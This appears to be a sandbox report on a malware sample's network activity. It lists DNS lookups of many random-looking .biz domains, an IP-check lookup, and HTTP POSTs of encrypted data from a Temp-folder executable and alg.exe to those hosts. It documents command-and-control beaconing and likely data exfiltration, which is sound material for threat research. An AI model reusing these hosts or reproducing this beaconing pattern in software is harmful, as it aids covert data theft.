Oct 20, 2024 18:42:46.064300060 CEST	192.168.2.4	1.1.1.1	0x4769	Standard query (0)	gnqgo.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:47.681284904 CEST	192.168.2.4	1.1.1.1	0x36da	Standard query (0)	sxmiywsfv.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:47.883501053 CEST	192.168.2.4	1.1.1.1	0xc7b	Standard query (0)	jhvzpcfg.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:49.770478010 CEST	192.168.2.4	1.1.1.1	0x1c2c	Standard query (0)	acwjcqqv.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:51.323434114 CEST	192.168.2.4	1.1.1.1	0xc588	Standard query (0)	vrrazpdh.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:52.694118977 CEST	192.168.2.4	1.1.1.1	0x7104	Standard query (0)	ftxlah.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:52.908458948 CEST	192.168.2.4	1.1.1.1	0x66d4	Standard query (0)	lejtdj.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:52.977608919 CEST	192.168.2.4	1.1.1.1	0x7e3c	Standard query (0)	vyome.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:55.358757019 CEST	192.168.2.4	1.1.1.1	0x4552	Standard query (0)	yauexmxk.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:57.026463985 CEST	192.168.2.4	1.1.1.1	0xf2e4	Standard query (0)	typgfhb.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:57.350280046 CEST	192.168.2.4	1.1.1.1	0x393b	Standard query (0)	iuzpxe.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:43:00.444981098 CEST	192.168.2.4	1.1.1.1	0xf17f	Standard query (0)	sxmiywsfv.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:43:01.121829033 CEST	192.168.2.4	1.1.1.1	0x8e63	Standard query (0)	esuzf.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:43:03.579818010 CEST	192.168.2.4	1.1.1.1	0xe550	Standard query (0)	vrrazpdh.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:43:04.032821894 CEST	192.168.2.4	1.1.1.1	0xfbea	Standard query (0)	gvijgjwkh.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:43:04.823201895 CEST	192.168.2.4	1.1.1.1	0xee10	Standard query (0)	ftxlah.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:43:06.235778093 CEST	192.168.2.4	1.1.1.1	0x232d	Standard query (0)	qpnczch.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:43:09.088500023 CEST	192.168.2.4	1.1.1.1	0x2e19	Standard query (0)	typgfhb.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:43:12.266199112 CEST	192.168.2.4	1.1.1.1	0x3312	Standard query (0)	brsua.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 20, 2024 18:41:12.023854971 CEST	1.1.1.1	192.168.2.4	0x1664	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:12.023854971 CEST	1.1.1.1	192.168.2.4	0x1664	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:12.023854971 CEST	1.1.1.1	192.168.2.4	0x1664	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:12.214590073 CEST	1.1.1.1	192.168.2.4	0x590e	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:12.904422045 CEST	1.1.1.1	192.168.2.4	0x47ac	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:13.204436064 CEST	1.1.1.1	192.168.2.4	0x2bdc	No error (0)	ssbzmoy.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:15.174012899 CEST	1.1.1.1	192.168.2.4	0x4756	No error (0)	ssbzmoy.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:16.415081978 CEST	1.1.1.1	192.168.2.4	0x52f2	No error (0)	cvgrf.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:17.085668087 CEST	1.1.1.1	192.168.2.4	0xa18	No error (0)	s82.gocheapweb.com		51.195.88.199	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:18.625870943 CEST	1.1.1.1	192.168.2.4	0xb723	No error (0)	cvgrf.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:19.036453009 CEST	1.1.1.1	192.168.2.4	0x1728	No error (0)	npukfztj.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:20.756107092 CEST	1.1.1.1	192.168.2.4	0xb020	No error (0)	npukfztj.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:22.074918985 CEST	1.1.1.1	192.168.2.4	0x329d	No error (0)	przvgke.biz		172.234.222.143	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:22.074918985 CEST	1.1.1.1	192.168.2.4	0x329d	No error (0)	przvgke.biz		172.234.222.138	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:23.960261106 CEST	1.1.1.1	192.168.2.4	0x5c55	No error (0)	przvgke.biz		172.234.222.138	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:23.960261106 CEST	1.1.1.1	192.168.2.4	0x5c55	No error (0)	przvgke.biz		172.234.222.143	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:24.110521078 CEST	1.1.1.1	192.168.2.4	0x20ad	Name error (3)	zlenh.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:24.122941017 CEST	1.1.1.1	192.168.2.4	0xbea4	No error (0)	knjghuig.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:26.031457901 CEST	1.1.1.1	192.168.2.4	0xbc10	Name error (3)	zlenh.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:26.040333033 CEST	1.1.1.1	192.168.2.4	0x3db0	No error (0)	knjghuig.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:27.631894112 CEST	1.1.1.1	192.168.2.4	0x935c	Name error (3)	uhxqin.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:27.640486002 CEST	1.1.1.1	192.168.2.4	0xcd73	Name error (3)	anpmnmxo.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:27.651263952 CEST	1.1.1.1	192.168.2.4	0x390a	No error (0)	lpuegx.biz		82.112.184.197	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:29.171266079 CEST	1.1.1.1	192.168.2.4	0x1645	Name error (3)	uhxqin.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:29.179774046 CEST	1.1.1.1	192.168.2.4	0x50a9	Name error (3)	anpmnmxo.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:29.188765049 CEST	1.1.1.1	192.168.2.4	0xa25a	No error (0)	lpuegx.biz		82.112.184.197	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:33.066204071 CEST	1.1.1.1	192.168.2.4	0x12ee	No error (0)	vjaxhpbji.biz		82.112.184.197	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:40.996071100 CEST	1.1.1.1	192.168.2.4	0xf668	No error (0)	xlfhhhm.biz		47.129.31.212	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:44.517258883 CEST	1.1.1.1	192.168.2.4	0x50b5	No error (0)	vjaxhpbji.biz		82.112.184.197	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:44.601511002 CEST	1.1.1.1	192.168.2.4	0x109f	No error (0)	ifsaia.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:48.199065924 CEST	1.1.1.1	192.168.2.4	0xd6ee	No error (0)	saytjshyf.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:50.431921959 CEST	1.1.1.1	192.168.2.4	0x1fa8	No error (0)	vcddkls.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:53.081427097 CEST	1.1.1.1	192.168.2.4	0x3f7a	No error (0)	fwiwk.biz		172.234.222.138	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:53.081427097 CEST	1.1.1.1	192.168.2.4	0x3f7a	No error (0)	fwiwk.biz		172.234.222.143	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:56.051780939 CEST	1.1.1.1	192.168.2.4	0xa931	No error (0)	tbjrpv.biz		34.246.200.160	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:59.383965969 CEST	1.1.1.1	192.168.2.4	0xbc2a	No error (0)	deoci.biz		18.208.156.248	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:59.906891108 CEST	1.1.1.1	192.168.2.4	0xd524	No error (0)	xlfhhhm.biz		47.129.31.212	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:01.933233976 CEST	1.1.1.1	192.168.2.4	0x7266	No error (0)	gytujflc.biz		208.100.26.245	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:03.281583071 CEST	1.1.1.1	192.168.2.4	0x863a	No error (0)	qaynky.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:03.303178072 CEST	1.1.1.1	192.168.2.4	0xa668	No error (0)	ifsaia.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:04.907668114 CEST	1.1.1.1	192.168.2.4	0x2d9e	No error (0)	saytjshyf.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:06.806967020 CEST	1.1.1.1	192.168.2.4	0xc59e	No error (0)	vcddkls.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:06.836894035 CEST	1.1.1.1	192.168.2.4	0x47b2	No error (0)	bumxkqgxu.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:07.984553099 CEST	1.1.1.1	192.168.2.4	0x1ce7	No error (0)	dwrqljrr.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:10.103024006 CEST	1.1.1.1	192.168.2.4	0x7e6f	No error (0)	nqwjmb.biz		35.164.78.200	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:10.424431086 CEST	1.1.1.1	192.168.2.4	0xb2b6	No error (0)	fwiwk.biz		172.234.222.138	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:10.424431086 CEST	1.1.1.1	192.168.2.4	0xb2b6	No error (0)	fwiwk.biz		172.234.222.143	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:12.354573965 CEST	1.1.1.1	192.168.2.4	0x1484	No error (0)	tbjrpv.biz		34.246.200.160	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:13.304079056 CEST	1.1.1.1	192.168.2.4	0xd391	No error (0)	ytctnunms.biz		3.94.10.34	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:14.962502956 CEST	1.1.1.1	192.168.2.4	0x74e2	No error (0)	deoci.biz		18.208.156.248	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:15.281528950 CEST	1.1.1.1	192.168.2.4	0x5bae	No error (0)	myups.biz		165.160.15.20	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:15.281528950 CEST	1.1.1.1	192.168.2.4	0x5bae	No error (0)	myups.biz		165.160.13.20	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:16.854008913 CEST	1.1.1.1	192.168.2.4	0xb0ac	No error (0)	gytujflc.biz		208.100.26.245	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:16.934036016 CEST	1.1.1.1	192.168.2.4	0xb304	No error (0)	oshhkdluh.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:18.687854052 CEST	1.1.1.1	192.168.2.4	0x5d5d	No error (0)	qaynky.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:20.324955940 CEST	1.1.1.1	192.168.2.4	0xf45b	No error (0)	bumxkqgxu.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:20.449310064 CEST	1.1.1.1	192.168.2.4	0x9e9b	No error (0)	yunalwv.biz		208.100.26.245	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:20.449321032 CEST	1.1.1.1	192.168.2.4	0x9e9b	No error (0)	yunalwv.biz		208.100.26.245	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:22.751544952 CEST	1.1.1.1	192.168.2.4	0x1245	No error (0)	jpskm.biz		34.211.97.45	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:24.037859917 CEST	1.1.1.1	192.168.2.4	0x3276	No error (0)	dwrqljrr.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:24.998553991 CEST	1.1.1.1	192.168.2.4	0x2d10	No error (0)	lrxdmhrr.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:26.128545046 CEST	1.1.1.1	192.168.2.4	0xa58f	No error (0)	nqwjmb.biz		35.164.78.200	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:27.419081926 CEST	1.1.1.1	192.168.2.4	0x6fb8	No error (0)	wllvnzb.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:28.194195032 CEST	1.1.1.1	192.168.2.4	0xbbb0	No error (0)	ytctnunms.biz		3.94.10.34	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:30.581362963 CEST	1.1.1.1	192.168.2.4	0x93ed	No error (0)	myups.biz		165.160.13.20	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:30.581362963 CEST	1.1.1.1	192.168.2.4	0x93ed	No error (0)	myups.biz		165.160.15.20	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:30.867654085 CEST	1.1.1.1	192.168.2.4	0xdada	No error (0)	gnqgo.biz		18.208.156.248	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:32.638122082 CEST	1.1.1.1	192.168.2.4	0xb9fa	No error (0)	oshhkdluh.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:33.919821978 CEST	1.1.1.1	192.168.2.4	0xef81	No error (0)	jhvzpcfg.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:35.090266943 CEST	1.1.1.1	192.168.2.4	0x3f04	No error (0)	yunalwv.biz		208.100.26.245	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:36.687151909 CEST	1.1.1.1	192.168.2.4	0x6bb4	No error (0)	acwjcqqv.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:36.956882000 CEST	1.1.1.1	192.168.2.4	0x2052	No error (0)	jpskm.biz		34.211.97.45	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:39.900892019 CEST	1.1.1.1	192.168.2.4	0x7f3d	No error (0)	lrxdmhrr.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:40.332752943 CEST	1.1.1.1	192.168.2.4	0x5ce4	No error (0)	vyome.biz		44.213.104.86	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:41.961503983 CEST	1.1.1.1	192.168.2.4	0x29e0	No error (0)	yauexmxk.biz		18.208.156.248	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:42.394593000 CEST	1.1.1.1	192.168.2.4	0x20d8	No error (0)	wllvnzb.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:44.132838964 CEST	1.1.1.1	192.168.2.4	0xb2c6	No error (0)	iuzpxe.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:46.074402094 CEST	1.1.1.1	192.168.2.4	0x4769	No error (0)	gnqgo.biz		18.208.156.248	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:47.688571930 CEST	1.1.1.1	192.168.2.4	0x36da	No error (0)	sxmiywsfv.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:47.891428947 CEST	1.1.1.1	192.168.2.4	0xc7b	No error (0)	jhvzpcfg.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:49.777803898 CEST	1.1.1.1	192.168.2.4	0x1c2c	No error (0)	acwjcqqv.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:51.331166983 CEST	1.1.1.1	192.168.2.4	0xc588	No error (0)	vrrazpdh.biz		34.211.97.45	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:52.701785088 CEST	1.1.1.1	192.168.2.4	0x7104	No error (0)	ftxlah.biz		47.129.31.212	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:52.985380888 CEST	1.1.1.1	192.168.2.4	0x7e3c	No error (0)	vyome.biz		44.213.104.86	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:55.367780924 CEST	1.1.1.1	192.168.2.4	0x4552	No error (0)	yauexmxk.biz		18.208.156.248	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:57.254477978 CEST	1.1.1.1	192.168.2.4	0xf2e4	No error (0)	typgfhb.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:57.357388973 CEST	1.1.1.1	192.168.2.4	0x393b	No error (0)	iuzpxe.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:43:00.452827930 CEST	1.1.1.1	192.168.2.4	0xf17f	No error (0)	sxmiywsfv.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:43:01.308326006 CEST	1.1.1.1	192.168.2.4	0x8e63	No error (0)	esuzf.biz		34.211.97.45	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:43:03.761405945 CEST	1.1.1.1	192.168.2.4	0xe550	No error (0)	vrrazpdh.biz		34.211.97.45	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:43:04.040132999 CEST	1.1.1.1	192.168.2.4	0xfbea	No error (0)	gvijgjwkh.biz		3.94.10.34	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:43:04.832154036 CEST	1.1.1.1	192.168.2.4	0xee10	No error (0)	ftxlah.biz		47.129.31.212	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:43:06.243293047 CEST	1.1.1.1	192.168.2.4	0x232d	No error (0)	qpnczch.biz		44.213.104.86	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:43:09.095763922 CEST	1.1.1.1	192.168.2.4	0x2e19	No error (0)	typgfhb.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:43:12.273518085 CEST	1.1.1.1	192.168.2.4	0x3312	No error (0)	brsua.biz		3.254.94.185	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

pywolwnvd.biz

ssbzmoy.biz

cvgrf.biz

npukfztj.biz

przvgke.biz

knjghuig.biz

lpuegx.biz

vjaxhpbji.biz

xlfhhhm.biz

ifsaia.biz

saytjshyf.biz

vcddkls.biz

fwiwk.biz

tbjrpv.biz

deoci.biz

gytujflc.biz

qaynky.biz

bumxkqgxu.biz

dwrqljrr.biz

nqwjmb.biz

ytctnunms.biz

myups.biz

oshhkdluh.biz

yunalwv.biz

jpskm.biz

lrxdmhrr.biz

wllvnzb.biz

gnqgo.biz

jhvzpcfg.biz

acwjcqqv.biz

vyome.biz

yauexmxk.biz

iuzpxe.biz

sxmiywsfv.biz

vrrazpdh.biz

ftxlah.biz

typgfhb.biz

esuzf.biz

gvijgjwkh.biz

qpnczch.biz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	54.244.188.177	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:12.244415998 CEST	353	OUT	POST /atfsybxv HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:41:12.244455099 CEST	826	OUT	Data Raw: db 70 d4 f2 a8 87 51 6e 2e 03 00 00 20 8d 58 7e 57 7d 0c 7f 9c f5 9b 78 46 60 3d ce 83 83 68 c1 26 fc 0a e7 77 39 53 e9 26 fd 2e 20 b6 ec cc 48 2a 82 ee ab 1c f9 ff 65 95 4e 24 5d e6 80 30 e2 7e 84 4f cd 70 e3 27 c9 95 3c 3d 9e 4a b1 13 64 4f 8e Data Ascii: pQn. X~W}xF`=h&w9S&. H*eN$]0~Op'<=JdO;u1e~7Xq#]g3_u[>?[GHrJuc\yyChl2f;DNe}Ik \t}Qo_G?SbZbA[JyU2=1 pYy
Oct 20, 2024 18:41:13.185184956 CEST	415	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 20 Oct 2024 16:41:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=3f3956218076f853e6bc83559d394d47\|96.44.151.125\|1729442473\|1729442473\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	54.244.188.177	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:13.082602024 CEST	349	OUT	POST /gdxe HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:13.082602024 CEST	778	OUT	Data Raw: 38 22 c2 fa 7a 33 4c 62 fe 02 00 00 e9 2f b5 57 80 ae 27 23 8c d4 cf f3 a5 19 e8 b0 f5 e1 f2 8b da eb 7a 39 3f d5 0d d6 51 c3 6f c6 22 5b 04 31 cb a7 54 64 99 15 2e 76 71 7b 25 14 da 57 2f 6c 3c f9 3d ec a6 b9 04 61 17 bf 4d 16 47 ec 59 ae e6 87 Data Ascii: 8"z3Lb/W'#z9?Qo"[1Td.vq{%W/l<=aMGYGBq?P7Yhzki;Vo[oYo"Fu>\ua_L,A%s#!DTTPX>\/"@x/f{-bh[)1&<($`tBaw5t

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	18.141.10.107	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:13.227921963 CEST	353	OUT	POST /dggpmrspif HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:41:13.228003979 CEST	826	OUT	Data Raw: 69 a0 3d 4e 4d e6 cd b7 2e 03 00 00 be 79 79 5c c3 df 94 cb 9d d6 31 e4 90 df dd c5 6a f8 35 c2 d9 84 b7 94 ea 47 d2 ae 56 bb 7d 1e be 33 ec d2 63 1b ba c9 7b c7 a7 81 6c 05 72 b5 b8 1a bf db ba 8c 3a 64 95 28 14 0f 33 d3 b0 8e c8 78 9b 24 2b fa Data Ascii: i=NM.yy\1j5GV}3c{lr:d(3x$+iugF`[?S85MB1t#L/9SLSg+@EYP{s;#`64)d!n_u`S?z,uZQ6L=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49735	54.244.188.177	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:14.202733994 CEST	355	OUT	POST /tynxrhlkri HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:14.202769995 CEST	778	OUT	Data Raw: f9 cc 6e aa 3d 9b 71 91 fe 02 00 00 5d f5 0f 60 bb 3a 69 9b 4d 08 76 4f 64 6f 6a 80 a1 1f 87 ff e7 19 e4 16 10 e6 4f 13 ed 22 f1 37 19 c9 c5 0c 7e 74 c1 c7 57 53 a6 42 20 18 55 5e 8b f1 af c0 e6 c3 55 ca 9a 66 68 12 20 b3 0e c6 57 ef f1 6a eb 5f Data Ascii: n=q]`:iMvOdojO"7~tWSB U^Ufh Wj_EOWcPg9\x/U ~RkJi3ABEgass*yTZM"TH<ux,l-O3p~4 3_ q=Ob~.!(\|r6P]eHx$
Oct 20, 2024 18:41:15.147489071 CEST	415	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 20 Oct 2024 16:41:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=395df2cbebaaed2e43ac0f174861cef0\|96.44.151.125\|1729442475\|1729442475\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49737	18.141.10.107	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:14.814536095 CEST	345	OUT	POST /rb HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:41:14.814616919 CEST	826	OUT	Data Raw: 31 f9 4a 4c 97 34 94 bc 2e 03 00 00 89 3e 36 65 89 aa 63 c2 87 f6 20 7f 6e c1 65 1c 33 e0 08 80 7b 65 6a 98 0b b8 4b 49 51 35 e7 e1 cf 2e c2 36 c3 b6 9a 80 33 7c b5 85 35 fc f0 9c a1 40 17 77 b5 d9 fc 2f bc aa f3 39 2b 1f dc 1a c2 3a 7e 97 07 f7 Data Ascii: 1JL4.>6ec ne3{ejKIQ5.63\|5@w/9+:~ZP1'>8c<N%{1aa:]S-?-i{%9(vuW15p(6V1>iD7Go=<m04nhif["4r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49738	18.141.10.107	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:15.329910040 CEST	346	OUT	POST /mrl HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:15.329967022 CEST	778	OUT	Data Raw: e7 d3 09 65 8b dc 4e b5 fe 02 00 00 02 07 12 0c 3e 31 11 e4 d5 e4 4c f3 87 ee d9 6e fc 28 28 12 cc be 71 30 1a 2e 1d 16 a9 aa a7 cd 3c 2e ad e1 bd 37 c5 ba 3e 3e e4 fe 16 3b 16 4b f3 41 b2 23 f9 d0 e8 ee 09 df 8f 4b 79 e7 56 cd 38 87 5c d7 89 50 Data Ascii: eN>1Ln((q0.<.7>>;KA#KyV8\P~2lT>.C)m@h83B^_In/"V5.9\[&"7wmM!q#6M6yxYQ$pm#<Y%h(sXz_+7?z"n)yR,I\|;

